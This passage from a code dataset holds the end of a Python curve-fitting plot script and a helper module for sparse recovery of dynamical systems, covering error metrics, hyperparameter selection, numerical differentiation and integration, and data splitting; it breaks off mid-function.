label='model'\n )\n axes[0].set_yscale('log')\n axes[0].set_xscale('log')\n \n line1, = axes[1].plot(\n data.temperature,\n model_fun_array[1],\n label='relative residual',\n ls='none', marker='+'\n ) \n \n for ax in axes:\n ax.grid(True)\n ax.legend()\n\n def chi2_legend(param):\n \n chi2 = chi2_ruo2(param)\n dof = data.nsamples\n for ax in axes:\n ax.legend(title='$\\chi^2=${:.3e}\\ndof={:.3e}'.format(chi2, dof)) \n\n mfit = Manual_fitting(\n [line0,line1],\n model_fun,\n model.parameters_0,\n callback=chi2_legend\n )\n","sub_path":"fitting_class.py","file_name":"fitting_class.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"632766778","text":"import numpy as np\nimport time\n\nts = time.time()\nfrom scipy.optimize import minimize_scalar\nimport pickle\nimport math\n\n\"\"\"# Miscelaneous Functions\n\n\"\"\"\n\n\ndef display_statistics(dynamic, exact_dynamic, noise, formulation_matrices):\n print(\"Noise level: \" + str(noise))\n print(\n \"Recovery error :\"\n + str(np.linalg.norm(dynamic - exact_dynamic))\n + \"\\tDerivative inference :\"\n + str(\n np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_validation\"])\n )\n )\n + \"\\tTrajectory inference :\"\n + str(\n np.linalg.norm(\n np.dot(\n dynamic - exact_dynamic, formulation_matrices[\"matrix_validation\"]\n )\n )\n )\n + \"\\tPrimal gap (derivative training): \"\n + str(\n np.linalg.norm(\n formulation_matrices[\"Y_train\"]\n - np.dot(dynamic, formulation_matrices[\"Psi_train\"])\n )\n )\n + \"\\tPrimal gap (trajectory training): \"\n + str(\n np.linalg.norm(\n formulation_matrices[\"delta_train\"]\n - np.dot(dynamic, formulation_matrices[\"matrix_train\"])\n )\n )\n + \"\\tExtra terms :\"\n + str(np.count_nonzero(np.multiply(exact_dynamic == 0.0, dynamic != 0.0)))\n + \"\\tMissing terms :\"\n + str(np.count_nonzero(np.multiply(exact_dynamic != 0.0, dynamic == 0.0)))\n )\n print()\n return\n\n\ndef evaluate_dynamic(\n data,\n dynamic,\n exact_dynamic,\n noise,\n noise_levels,\n formulation_matrices,\n show_output=False,\n):\n index = noise_levels.index(noise)\n assert (\n \"Psi_validation\" in formulation_matrices\n and \"matrix_validation\" in formulation_matrices\n ), \"Missing validation matrices to compute metrics.\"\n assert (\n \"Y_validation\" in formulation_matrices\n and \"delta_validation\" in formulation_matrices\n ), \"Missing validation matrices to compute metrics.\"\n assert (\n \"Psi_train\" in formulation_matrices and \"matrix_train\" in formulation_matrices\n ), \"Missing training matrices to compute metrics.\"\n assert (\n \"Y_train\" in formulation_matrices and \"delta_train\" in formulation_matrices\n ), \"Missing training matrices to compute metrics.\"\n\n # Recovery_error\n if \"accuracy_recovery\" in data:\n data[\"accuracy_recovery\"][index] = np.linalg.norm(dynamic - exact_dynamic)\n else:\n data[\"accuracy_recovery\"] = np.zeros(len(noise_levels))\n data[\"accuracy_recovery\"][index] = np.linalg.norm(dynamic - exact_dynamic)\n # Inference of derivatives.\n if \"accuracy_data\" in data:\n data[\"accuracy_data\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_validation\"])\n )\n else:\n data[\"accuracy_data\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_validation\"])\n )\n # Inference of trajectories\n if \"accuracy_trajectory\" in data:\n 
data[\"accuracy_trajectory\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_validation\"])\n )\n else:\n data[\"accuracy_trajectory\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_validation\"])\n )\n # Extra terms\n if \"extra\" in data:\n data[\"extra\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic == 0.0, dynamic != 0.0)\n )\n else:\n data[\"extra\"] = np.zeros(len(noise_levels))\n data[\"extra\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic == 0.0, dynamic != 0.0)\n )\n # Missing terms\n if \"missing\" in data:\n data[\"missing\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic != 0.0, dynamic == 0.0)\n )\n else:\n data[\"missing\"] = np.zeros(len(noise_levels))\n data[\"missing\"][index] = np.count_nonzero(\n np.multiply(exact_dynamic != 0.0, dynamic == 0.0)\n )\n # Inference of derivatives (old measure).\n if \"accuracy_data_old\" in data:\n data[\"accuracy_data_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_validation\"])\n - formulation_matrices[\"Y_validation\"]\n )\n else:\n data[\"accuracy_data_old\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_validation\"])\n - formulation_matrices[\"Y_validation\"]\n )\n # Inference of trajectories (old measure).\n if \"accuracy_trajectory_old\" in data:\n data[\"accuracy_trajectory_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_validation\"])\n - formulation_matrices[\"delta_validation\"]\n )\n else:\n data[\"accuracy_trajectory_old\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory_old\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_validation\"])\n - formulation_matrices[\"delta_validation\"]\n )\n # Inference of derivatives (training_data)\n if \"accuracy_data_train\" in data:\n data[\"accuracy_data_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_train\"])\n )\n else:\n data[\"accuracy_data_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"Psi_train\"])\n )\n # Inference of trajectories (training_data)\n if \"accuracy_trajectory_train\" in data:\n data[\"accuracy_trajectory_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_train\"])\n )\n else:\n data[\"accuracy_trajectory_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory_train\"][index] = np.linalg.norm(\n np.dot(dynamic - exact_dynamic, formulation_matrices[\"matrix_train\"])\n )\n # Inference of derivatives (old measure training data).\n if \"accuracy_data_old_train\" in data:\n data[\"accuracy_data_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_train\"])\n - formulation_matrices[\"Y_train\"]\n )\n else:\n data[\"accuracy_data_old_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_data_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"Psi_train\"])\n - formulation_matrices[\"Y_train\"]\n )\n # Inference of trajectories (old measure).\n if \"accuracy_trajectory_old_train\" in data:\n data[\"accuracy_trajectory_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_train\"])\n - formulation_matrices[\"delta_train\"]\n 
)\n else:\n data[\"accuracy_trajectory_old_train\"] = np.zeros(len(noise_levels))\n data[\"accuracy_trajectory_old_train\"][index] = np.linalg.norm(\n np.dot(dynamic, formulation_matrices[\"matrix_train\"])\n - formulation_matrices[\"delta_train\"]\n )\n if show_output:\n print(\n \"Recovery error :\"\n + str(data[\"accuracy_recovery\"][index])\n + \"\\tDerivative inference :\"\n + str(data[\"accuracy_data\"][index])\n + \"\\tTrajectory inference :\"\n + str(data[\"accuracy_trajectory\"][index])\n + \"\\tExtra terms :\"\n + str(data[\"extra\"][index])\n + \"\\tMissing terms :\"\n + str(data[\"missing\"][index])\n )\n return data\n\n\ndef trim_axs(axs, N):\n \"\"\"little helper to massage the axs list to have correct length...\"\"\"\n axs = axs.flat\n for ax in axs[N:]:\n ax.remove()\n return axs[:N]\n\n\ndef plot_params_tried(p_space, trials, dist_plots=True, **kwargs):\n \"\"\"\n Plots the parameters tried by hyperopt.\n p_space: Hyperopt parameter space.\n trials: Hyperopt trials object.\n dist_plots: If True, plots the distribution of values tried for each parameter.\n If False, plots a scatter plot of loss vs parameter values. Default True.\n params: Parameters to be plotted. Default = All parameters in p_space.\n ncols: Number of columns in the figure. Default = 3\n figsize: Figure size. Default = (15, 5*nrows).\n constrained_layout: Constrained layout. Default = True.\n \"\"\"\n import pandas as pd\n import matplotlib.pyplot as plt\n import seaborn as sns\n from hyperopt import space_eval\n\n defaults = {\"params\": p_space.keys(), \"ncols\": 2, \"constrained_layout\": True}\n defaults = {k: v for k, v in defaults.items() if k not in kwargs}\n kwargs = {**kwargs, **defaults}\n params = kwargs[\"params\"]\n del kwargs[\"params\"]\n results_df = pd.DataFrame(columns=[\"tid\", *params, \"loss\", \"status\"])\n for t in trials.trials:\n result_dict = t[\"misc\"][\"vals\"]\n result_dict = {d: v[0] for d, v in result_dict.items()}\n result_dict = space_eval(p_space, result_dict)\n result_dict[\"tid\"] = t[\"tid\"]\n result_dict.update(t[\"result\"])\n results_df = pd.concat(\n [results_df, pd.DataFrame(result_dict, index=[0])],\n axis=0,\n ignore_index=True,\n )\n results_df = results_df[results_df.status == \"ok\"]\n results_df = results_df.infer_objects()\n nrows = int(math.ceil((len(params) + 1) / kwargs[\"ncols\"]))\n if \"figsize\" not in kwargs.keys():\n kwargs[\"figsize\"] = (15, 5 * nrows)\n f, axs = plt.subplots(nrows=nrows, **kwargs)\n axs = trim_axs(axs, len(params) + 1)\n f.suptitle(\"Parameter Space tried by Hyperopt & Loss\")\n for ax, p in zip(axs, [*params, \"loss\"]):\n if p == \"loss\":\n sns.scatterplot(x=results_df.tid, y=results_df.loc[:, p], alpha=0.8, ax=ax)\n ax.set_title(\"Scatterplot of Loss vs trial number.\")\n elif dist_plots:\n if pd.api.types.is_bool_dtype(\n results_df.loc[:, p]\n ) or pd.api.types.is_string_dtype(results_df.loc[:, p]):\n sns.countplot(results_df.loc[:, p], ax=ax)\n else:\n sns.distplot(results_df.loc[:, p].astype(\"float\"), bins=10, ax=ax)\n ax.set_title(p)\n else:\n sns.scatterplot(x=results_df.loc[:, p], y=results_df.loss, alpha=0.8, ax=ax)\n ax.set_title(f\"{p} vs loss\")\n plt.show()\n return results_df\n\n\n# Select the parameter that minimizes the loss_function.\ndef regularization_selection(\n loss_function,\n type_algorithm,\n options,\n show_progress=False,\n skip_minimization_check=False,\n):\n if type_algorithm == \"brute\":\n x = np.linspace(options[\"min\"], options[\"max\"], options[\"number_evaluations\"])\n min_error = 
loss_function(x[0])\n min_regularization = x[0]\n error = [loss_function(x[0])]\n for i in range(1, options[\"number_evaluations\"]):\n error.append(loss_function(x[i]))\n if min_error > error[-1]:\n min_error = error[-1]\n min_regularization = x[i]\n if show_progress:\n import matplotlib.pyplot as plt\n\n plt.plot(x, error)\n plt.show()\n return min_regularization\n\n if type_algorithm == \"minimization\":\n from scipy.optimize import minimize_scalar\n\n reg = minimize_scalar(\n lambda x: loss_function(x),\n method=\"bounded\",\n bounds=(options[\"min\"], options[\"max\"]),\n options={\n \"xatol\": options[\"xatol\"],\n \"maxiter\": options[\"number_evaluations\"],\n },\n )\n if reg[\"success\"]:\n if skip_minimization_check:\n if show_progress:\n print(\n \"Final parameter selected: \",\n reg[\"x\"],\n \" Number of calls: \",\n reg,\n \" Max number calls: \",\n options[\"number_evaluations\"],\n )\n return reg[\"x\"]\n else:\n # Compare to the loss if we have zero regularization.\n if loss_function(reg[\"x\"]) <= loss_function(0.0):\n if show_progress:\n print(\n \"Final parameter selected: \",\n reg[\"x\"],\n \" Number of calls: \",\n reg,\n \" Max number calls: \",\n options[\"number_evaluations\"],\n )\n return reg[\"x\"]\n else:\n if show_progress:\n print(\n \"Final parameter selected: \",\n 0.0,\n \" Number of calls: \",\n reg,\n \" Max number calls: \",\n options[\"number_evaluations\"],\n )\n return 0.0\n else:\n return regularization_selection(loss_function, \"brute\", options)\n\n if type_algorithm == \"bayesian\":\n from hyperopt import fmin, hp, tpe, Trials\n from auxiliary_functions import plot_params_tried\n\n if options[\"distribution\"] == \"uniform\":\n trls = Trials()\n SPACE = {\n \"regularization\": hp.uniform(\n \"regularization\", options[\"min\"], options[\"max\"]\n )\n }\n reg = fmin(\n lambda x: loss_function(x[\"regularization\"]),\n space=SPACE,\n trials=trls,\n max_evals=options[\"number_evaluations\"],\n algo=tpe.suggest,\n show_progressbar=False,\n )\n print(\"Regularization parameter: \", reg[\"regularization\"])\n if show_progress:\n plot_params_tried(SPACE, trls, dist_plots=True)\n if skip_minimization_check:\n return reg[\"regularization\"]\n else:\n if loss_function(reg[\"regularization\"]) <= loss_function(\n options[\"max\"]\n ):\n return reg[\"regularization\"]\n else:\n return options[\"max\"]\n\n if options[\"distribution\"] == \"log-uniform\":\n trls = Trials()\n SPACE = {\n \"regularization\": hp.loguniform(\n \"regularization\", options[\"min\"], options[\"max\"]\n )\n }\n reg = fmin(\n lambda x: loss_function(x[\"regularization\"]),\n space=SPACE,\n trials=trls,\n max_evals=options[\"number_evaluations\"],\n algo=tpe.suggest,\n show_progressbar=False,\n )\n if show_progress:\n plot_params_tried(SPACE, trls, dist_plots=True)\n return reg[\"regularization\"]\n # return np.log(reg['regularization'])\n\n if options[\"distribution\"] == \"log-normal\":\n trls = Trials()\n SPACE = {\n \"regularization\": hp.lognormal(\n \"regularization\", options[\"mean\"], options[\"sigma\"]\n )\n }\n reg = fmin(\n lambda x: loss_function(x[\"regularization\"]),\n space=SPACE,\n trials=trls,\n max_evals=options[\"number_evaluations\"],\n algo=tpe.suggest,\n show_progressbar=False,\n )\n if show_progress:\n plot_params_tried(SPACE, trls, dist_plots=True)\n return reg[\"regularization\"]\n # return np.log(reg['regularization'])\n assert False, \"Type of algorithm selected is incorrect\"\n\n\ndef load_pickled_object(filepath):\n with open(filepath, \"rb\") as f:\n 
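# NOTE: pickle is assumed to be imported at module scope (import not visible in this excerpt).\n        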
loaded_object = pickle.load(f)\n return loaded_object\n\n\ndef dump_pickled_object(filepath, target_object):\n with open(filepath, \"wb\") as f:\n pickle.dump(target_object, f)\n\n\n# Defines the type of maximum vertex dot product that we'll return.\ndef max_vertex(grad, activeVertex):\n # See which extreme point in the active set gives greater inner product.\n maxProd = activeVertex[0].T.dot(grad)\n maxInd = 0\n for i in range(len(activeVertex)):\n aux = activeVertex[i].T.dot(grad)\n if aux > maxProd:\n maxProd = aux\n maxInd = i\n return activeVertex[maxInd], maxInd\n\n\n# Finds the step with the maximum and minimum inner product.\ndef max_min_vertex(grad, activeVertex):\n # See which extreme point in the active set gives greater inner product.\n maxProd = np.dot(activeVertex[0], grad)\n minProd = np.dot(activeVertex[0], grad)\n maxInd = 0\n minInd = 0\n for i in range(len(activeVertex)):\n if np.dot(activeVertex[i], grad) > maxProd:\n maxProd = np.dot(activeVertex[i], grad)\n maxInd = i\n else:\n if np.dot(activeVertex[i], grad) < minProd:\n minProd = np.dot(activeVertex[i], grad)\n minInd = i\n return activeVertex[maxInd], maxInd, activeVertex[minInd], minInd\n\n\ndef new_vertex_fail_fast(x, extremePoints):\n for i in range(len(extremePoints)):\n # Compare succesive indices.\n for j in range(len(extremePoints[i])):\n if extremePoints[i][j] != x[j]:\n break\n if j == len(extremePoints[i]) - 1:\n return False, i\n return True, np.nan\n\n\n# Finds if x is already in the extremePoint list.\n# Returns True if vertex is new, otherwise false and the index.\ndef check_new_vertex(vertex, active_set):\n for i in range(len(active_set)):\n if np.array_equal(active_set[i], vertex):\n return False, i\n return True, np.nan\n\n\n# Deletes the extremepoint from the representation.\ndef delete_vertex_index(index, extremePoints, weights):\n del extremePoints[index]\n del weights[index]\n return\n\n\n# Sort projection for the simplex.\ndef projection_simplex_sort(x, s=1):\n assert s > 0, \"Radius s must be strictly positive (%d <= 0)\" % s\n (n,) = x.shape # will raise ValueError if v is not 1-D\n if x.sum() == s and np.alltrue(x >= 0):\n return x\n v = x - np.max(x)\n u = np.sort(v)[::-1]\n cssv = np.cumsum(u)\n rho = np.count_nonzero(u * np.arange(1, n + 1) > (cssv - s)) - 1\n theta = float(cssv[rho] - s) / (rho + 1)\n w = (v - theta).clip(min=0)\n return w\n\n\n# Pick a stepsize.\ndef step_size(function, d, grad, x, typeStep=\"EL\", maxStep=None):\n if typeStep == \"Armijo\":\n from scipy.optimize.linesearch import line_search_armijo\n\n alpha, fc, phi1 = line_search_armijo(\n function.f, x.flatten(), d.flatten(), grad.flatten(), function.f(x)\n )\n return alpha\n if typeStep == \"SS\":\n return -np.dot(grad, d) / (function.largest_eigenvalue() * np.dot(d, d))\n else:\n if typeStep == \"GS\":\n options = {\"xatol\": 1e-08, \"maxiter\": 500000, \"disp\": 0}\n\n def InnerFunction(t): # Hidden from outer code\n return function.f(x + t * d)\n\n if maxStep is None:\n res = minimize_scalar(\n InnerFunction, bounds=(0, 1), method=\"bounded\", options=options\n )\n else:\n res = minimize_scalar(\n InnerFunction,\n bounds=(0, maxStep),\n method=\"bounded\",\n options=options,\n )\n return res.x\n else:\n if maxStep is None:\n return function.line_search(grad, d, x, maxStep=1.0)\n else:\n return function.line_search(grad, d, x, maxStep=maxStep)\n\n\n# Once the problem has been solved to a high accuracy, solve the problem.\ndef exportsolution(filepath, formatString, fOpt, xOpt, tolerance, size):\n with 
open(filepath, \"wb\") as f:\n np.savetxt(f, [np.array(formatString)], fmt=\"%s\", delimiter=\",\")\n np.savetxt(f, np.array([fOpt]), fmt=\"%.15f\")\n np.savetxt(f, [xOpt.T], fmt=\"%.11f\", delimiter=\",\")\n np.savetxt(f, np.array([tolerance]), fmt=\"%.15f\")\n np.savetxt(f, np.array([size]), fmt=\"%.15f\")\n return\n\n\n# Once the problem has been solved to a high accuracy, solve the problem.\ndef importSolution(filepath):\n with open(filepath) as f:\n _ = f.readline()\n fOpt = float(f.readline().rstrip())\n xOpt = np.asarray(f.readline().rstrip().split(\",\")).astype(float)\n tolerance = float(f.readline().rstrip())\n size = int(float(f.readline().rstrip()))\n return fOpt, xOpt, tolerance, size\n\n\ndef evaluate_polynomial_backup(X, polinomial):\n Psi = polinomial.fit_transform(X.T).T\n return Psi, Psi.shape[0]\n\n\ndef evaluate_polynomial(X, polinomial):\n Psi = polinomial.fit_transform(X.T).T\n return Psi\n\n\ndef polynomial_differentiation(u, x, deg=3, diff=1, width=5):\n\n \"\"\"\n u = values of some function\n x = x-coordinates where values are known\n deg = degree of polynomial to use\n diff = maximum order derivative we want\n width = width of window to fit to polynomial\n\n This throws out the data close to the edges since the polynomial derivative only works\n well when we're looking at the middle of the points fit.\n \"\"\"\n\n u = u.flatten()\n x = x.flatten()\n\n n = len(x)\n du = np.zeros((n - 2 * width, diff))\n\n # Take the derivatives in the center of the domain\n for j in range(width, n - width):\n\n points = np.arange(j - width, j + width)\n\n # Fit to a Chebyshev polynomial\n # this is the same as any polynomial since we're on a fixed grid but it's better conditioned :)\n poly = np.polynomial.chebyshev.Chebyshev.fit(x[points], u[points], deg)\n\n # Take derivatives\n for d in range(1, diff + 1):\n du[j - width, d - 1] = poly.deriv(m=d)(x[j])\n return du\n\n\ndef polynomial_integration(u, x, deg=4, diff=1, width=5):\n\n \"\"\"\n u = values of some function\n x = x-coordinates where values are known\n deg = degree of polynomial to use\n diff = maximum order derivative we want\n width = width of window to fit to polynomial\n\n This throws out the data close to the edges since the polynomial derivative only works\n well when we're looking at the middle of the points fit.\n \"\"\"\n\n u = u.flatten()\n x = x.flatten()\n\n n = len(x)\n du = np.zeros((n - 2 * width, diff))\n\n # Take the derivatives in the center of the domain\n for j in range(width, n - width):\n\n points = np.arange(j - width, j + width)\n\n # Fit to a Chebyshev polynomial\n # this is the same as any polynomial since we're on a fixed grid but it's better conditioned :)\n poly = np.polynomial.chebyshev.Chebyshev.fit(x[points], u[points], deg)\n\n # Create integral polynomial\n integral_poly = poly.integ()\n # Computes integral between x[j-1] and x[j]\n for d in range(1, diff + 1):\n du[j - width, d - 1] = integral_poly(x[j]) - integral_poly(x[j - 1])\n return np.cumsum(du)\n\n\ndef derivative(X, time, method=\"poly\", deg=2, diff=1, width=5):\n if method == \"poly\":\n dim, num_samples = X.shape\n derivative = np.zeros((dim, int(num_samples - 2.0 * width)))\n if diff == 2:\n second_derivative = np.zeros((dim, int(num_samples - 2.0 * width)))\n for i in range(dim):\n if diff == 1:\n derivative[i] = polynomial_differentiation(\n X[i], time, deg, diff, width\n ).squeeze()\n else:\n if diff == 2:\n val = polynomial_differentiation(X[i], time, deg, diff, width)\n derivative[i] = val[:, 0].squeeze()\n 
second_derivative[i] = val[:, 1].squeeze()\n else:\n assert (\n False\n ), \"Have only built infrastructure to handle first and second derivative.\"\n if diff == 1:\n return derivative, X[:, width:-width], time[width:-width]\n if diff == 2:\n # print(len(time[width:-width]), len(time))\n # quit()\n return derivative, second_derivative, X[:, width:-width], time[width:-width]\n if method == \"central\":\n # deriv = np.gradient(X, time, axis = 1)\n if diff == 1:\n return (\n (X[:, 2:] - X[:, :-2]) / (time[2:] - time[:-2]),\n X[:, 1:-1],\n time[1:-1],\n )\n if diff == 2:\n return (\n (X[:, 2:] - X[:, :-2]) / (time[2:] - time[:-2]),\n (X[:, 2:] - 2.0 * X[:, 1:-1] + X[:, :-2])\n / np.square(0.5 * (time[2:] - time[:-2])),\n X[:, 1:-1],\n time[1:-1],\n )\n if method == \"forward\":\n return np.diff(X, axis=1) / np.diff(time)[None, :], X[:, :-1], time[1:]\n\n\ndef derivative_from_list(list_X, list_time, method=\"poly\", deg=2, diff=1, width=5):\n assert diff == 1 or diff == 2, \"Order of differentiation not implemented.\"\n list_Y = []\n list_first_deriv = []\n list_X_updated = []\n list_time_updated = []\n for i in range(len(list_X)):\n if diff == 1:\n Y, X, t = derivative(\n list_X[i], list_time[i], method=method, deg=deg, diff=diff, width=width\n )\n if diff == 2:\n first_deriv, Y, X, t = derivative(\n list_X[i], list_time[i], method=method, deg=deg, diff=diff, width=width\n )\n list_first_deriv.append(first_deriv)\n list_Y.append(Y)\n list_X_updated.append(X)\n list_time_updated.append(t)\n if diff == 1:\n return list_Y, list_X_updated, list_time_updated\n else:\n return list_Y, list_first_deriv, list_X_updated, list_time_updated\n\n\ndef compute_integral_formulation_matrix(\n list_Psi,\n list_X,\n list_t,\n polinomial,\n type_of_integration=\"Simpsons\",\n width=5,\n order=3,\n):\n\n list_matrix = []\n list_delta = []\n for psi_val, x_val, t_val in zip(list_Psi, list_X, list_t):\n mat, x_values = cumulative_integration(\n psi_val,\n x_val,\n t_val,\n type_integration=type_of_integration,\n width=width,\n order=order,\n )\n list_matrix.append(mat)\n list_delta.append(x_values)\n return list_delta, list_matrix\n\n\ndef compute_exact_kuramoto_integral_formulation_matrix(\n list_X,\n list_t,\n intrinsic_frequencies,\n polinomial,\n num_basis_functions,\n number_of_samples=1000,\n):\n from dynamics import kuramoto_time_individual\n from scipy import integrate\n\n list_exact = []\n for k in range(len(list_t)):\n matrix = np.zeros((num_basis_functions, int(len(list_t[k]) - 1)))\n # First interval.\n for l in range(1, len(list_t[k])):\n position, time_stamp = kuramoto_time_individual(\n intrinsic_frequencies,\n list_X[k][:, l - 1],\n list_t[k][l - 1],\n list_t[k][l],\n number_of_samples,\n )\n position_sine_cosines = np.vstack((np.cos(position), np.sin(position)))\n psi_evaluation = evaluate_polynomial(position_sine_cosines, polinomial)\n matrix[:, l - 1] = integrate.simps(psi_evaluation, time_stamp)\n list_exact.append(np.cumsum(matrix, axis=1))\n return list_exact\n\n\ndef compute_exact_FPUT_integral_formulation_matrix(\n list_X,\n list_t,\n exact_solution,\n polinomial,\n num_basis_functions,\n number_of_samples=1000,\n):\n from dynamics import fermi_pasta_ulam_time_individual\n from scipy import integrate\n\n # Assume the initial velocities are zero\n list_exact = []\n for k in range(len(list_t)):\n matrix = np.zeros((num_basis_functions, int(len(list_t[k]) - 1)))\n # First interval.\n for l in range(1, len(list_t[k])):\n position, time_stamp = fermi_pasta_ulam_time_individual(\n exact_solution,\n 
polinomial,\n list_X[k][:, l - 1],\n list_t[k][l - 1],\n list_t[k][l],\n number_of_samples,\n )\n psi_evaluation = evaluate_polynomial(position, polinomial)\n matrix[:, l - 1] = integrate.simps(psi_evaluation, time_stamp)\n list_exact.append(np.cumsum(matrix, axis=1))\n return list_exact\n\n\ndef compute_exact_FPUT_integral_formulation_matrix_correct(\n list_X,\n list_first_deriv,\n list_t,\n exact_solution,\n polinomial,\n num_basis_functions,\n number_of_samples=1000,\n):\n from dynamics import fermi_pasta_ulam_time_individual_correct\n from scipy import integrate\n\n list_exact = []\n for k in range(len(list_t)):\n matrix = np.zeros((num_basis_functions, int(len(list_t[k]) - 1)))\n for l in range(1, len(list_t[k])):\n (\n position,\n velocity_matrix,\n time_stamp,\n ) = fermi_pasta_ulam_time_individual_correct(\n exact_solution,\n polinomial,\n list_X[k][:, l - 1],\n list_first_deriv[k][:, l - 1],\n list_t[k][l - 1],\n list_t[k][l],\n number_of_samples,\n )\n psi_evaluation = evaluate_polynomial(position, polinomial)\n matrix[:, l - 1] = integrate.simps(psi_evaluation, time_stamp)\n list_exact.append(np.cumsum(matrix, axis=1))\n return list_exact\n\n\n# Compute the cumulative integral of Psi in terms of t.\ndef cumulative_integration(Psi, x, t, type_integration=\"Simpsons\", width=5, order=3):\n assert (\n type_integration == \"Simpsons\"\n or type_integration == \"Trapezoid\"\n or type_integration == \"Poly\"\n ), \"Wrong integration rule.\"\n from scipy import integrate\n\n if type_integration == \"Simpsons\":\n x_output = (x - x[:, 0][:, np.newaxis])[:, 1:]\n num_basis_functions, number_of_samples = Psi.shape\n matrix = np.zeros((num_basis_functions, number_of_samples))\n for i in range(num_basis_functions):\n for j in range(0, number_of_samples):\n matrix[i, j] = integrate.simps(Psi[i, : j + 1], t[: j + 1])\n matrix = matrix[:, 1:]\n if type_integration == \"Trapezoid\":\n x_output = (x - x[:, 0][:, np.newaxis])[:, 1:]\n matrix = integrate.cumtrapz(Psi, t)\n if type_integration == \"Poly\":\n x_output = x[:, width:-width] - x[:, width - 1][:, np.newaxis]\n num_basis_functions, number_of_samples = Psi.shape\n matrix = np.zeros((num_basis_functions, int(number_of_samples - 2 * width)))\n for i in range(num_basis_functions):\n matrix[i, :] = polynomial_integration(Psi[i, :], t, deg=order, width=width)\n return matrix, x_output\n\n\ndef training_testing_validation_split(\n Psi, Y, proportion_train_data=0.7, proportion_testing_data=0.2\n):\n from sklearn.model_selection import train_test_split\n\n # Split into training and auxiliary\n Psi_train, Psi_aux, Y_train, Y_aux = train_test_split(\n Psi.T, Y.T, test_size=1.0 - proportion_train_data\n )\n Psi_validation, Psi_test, Y_validation, Y_test = train_test_split(\n Psi_aux,\n Y_aux,\n test_size=1 - proportion_testing_data / (1.0 - proportion_train_data),\n )\n return (\n Psi_train.T,\n Y_train.T,\n Psi_validation.T,\n Y_validation.T,\n Psi_test.T,\n Y_test.T,\n )\n\n\n# Given a dynamic, test how closely it resembles the testing data.\nclass testing_function:\n def __init__(\n self, Psi_test, Y_test, l0_penalty, exact_dynamic, normalization_factors\n ):\n self.Psi_test = Psi_test.copy()\n self.Y_test = Y_test.copy()\n self.l0_penalty = l0_penalty\n self.num_basis, self.num_samples = self.Psi_test.shape\n self.dimension, _ = Y_test.shape\n self.exact_dynamic = exact_dynamic.copy()\n self.normalization_factors = normalization_factors\n return\n\n def evaluate(self, dynamic):\n from scipy.sparse import isspmatrix_csr\n\n if 
isspmatrix_csr(dynamic):\n penalty = self.l0_penalty * dynamic.count_nonzero()\n else:\n penalty = self.l0_penalty * np.count_nonzero(dynamic)\n if dynamic.shape != self.exact_dynamic.shape:\n aux = dynamic.reshape(self.dimension, self.num_basis)\n return np.linalg.norm(aux.dot(self.Psi_test) - self.Y_test) + penalty\n else:\n return np.linalg.norm(dynamic.dot(self.Psi_test) - self.Y_test) + penalty\n\n def compare_exact_backup(self, dynamic):\n if dynamic.shape != self.exact_dynamic.shape:\n return np.linalg.norm(\n self.exact_dynamic - dynamic.reshape(self.exact_dynamic.shape)\n )\n else:\n return np.linalg.norm(self.exact_dynamic - dynamic)\n\n def compare_exact(self, dynamic):\n unnormalized = (\n dynamic.reshape(self.exact_dynamic.shape).T / self.normalization_factors\n ).T\n return np.linalg.norm(self.exact_dynamic - unnormalized)\n\n def return_Psi(self):\n return self.Psi_test\n\n def return_Y(self):\n return self.Y_test\n\n# Given a dynamic, test how closely it resembles the testing data.\nclass testing_function_simplex:\n def __init__(\n self, Psi_test, Y_test, l0_penalty, exact_dynamic, normalization_factors\n ):\n self.Psi_test = Psi_test.copy()\n self.Y_test = Y_test.copy()\n self.l0_penalty = l0_penalty\n self.num_basis, self.num_samples = self.Psi_test.shape\n self.dimension, _ = Y_test.shape\n self.exact_dynamic = exact_dynamic.copy()\n self.normalization_factors = normalization_factors\n return\n\n def evaluate(self, dynamic):\n from scipy.sparse import isspmatrix_csr\n\n dynamic = dynamic[:len(dynamic)//2] - dynamic[len(dynamic)//2:]\n\n if isspmatrix_csr(dynamic):\n penalty = self.l0_penalty * dynamic.count_nonzero()\n else:\n penalty = self.l0_penalty * np.count_nonzero(dynamic)\n if dynamic.shape != self.exact_dynamic.shape:\n aux = dynamic.reshape(self.dimension, self.num_basis)\n return np.linalg.norm(aux.dot(self.Psi_test) - self.Y_test) + penalty\n else:\n return np.linalg.norm(dynamic.dot(self.Psi_test) - self.Y_test) + penalty\n\n def compare_exact_backup(self, dynamic):\n dynamic = dynamic[:len(dynamic)//2] - dynamic[len(dynamic)//2:]\n \n if dynamic.shape != self.exact_dynamic.shape:\n return np.linalg.norm(\n self.exact_dynamic - dynamic.reshape(self.exact_dynamic.shape)\n )\n else:\n return 